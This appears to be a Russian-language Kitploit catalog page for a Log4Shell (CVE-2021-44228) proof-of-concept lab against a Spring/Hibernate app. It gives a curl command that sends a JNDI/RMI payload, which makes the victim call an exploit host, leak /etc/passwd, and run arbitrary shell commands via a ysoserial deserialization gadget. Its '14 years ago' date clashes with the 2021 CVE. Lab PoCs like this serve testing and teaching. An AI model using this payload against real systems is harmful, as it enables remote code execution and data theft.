Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2021-44228--spring-hibernate — CVE-2021-44228 POC - Spring / Hibernate | Kitploit
Инструменты/GitHubGitHub/uint0/cve-2021-44228--spring-hibernate
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubuint0/cve-2021-44228--spring-hibernate

cve-2021-44228--spring-hibernate

CVE-2021-44228 POC - Spring / Hibernate

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
14 лет назадЕщё не проверено

CVE-2021-44228 POC - Spring / Hibernate

Этот POC использует Spring / Hibernate, однако аналогичный подход rmi -> десериализация может быть использован для инициирования любой уязвимости десериализации

TL;DR

root@kitploit:~
$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'

Вы должны увидеть содержимое /etc/passwd жертвы в логах контейнера attacker. Вы можете заменить команду в сервисе exploit, чтобы выполнить любую shell-команду на жертве.

Жертва

Жертва запускает стандартное starter spring приложение с зависимостями "Spring Data JPA" (для Hibernate), "Spring Web" и "H2" (в качестве хранилища данных). Поверх этого были внесены только 2 изменения:

  1. Удалены тесты
  2. slf4j-логгер заменён на уязвимый log4j

Все зависимости актуальны. Никаких магических флагов не включено.

Жертва предоставляет конечную точку, принимающую POST, по адресу /, которая логирует запрос.

Эксплойт

Эксплойт использует форк ysoserial с генератором эксплойтов Hibernate. Чтобы эксплойт работал с последней версией Hibernate, нам потребуется перекомпилировать ysoserial.

Скачать инструмент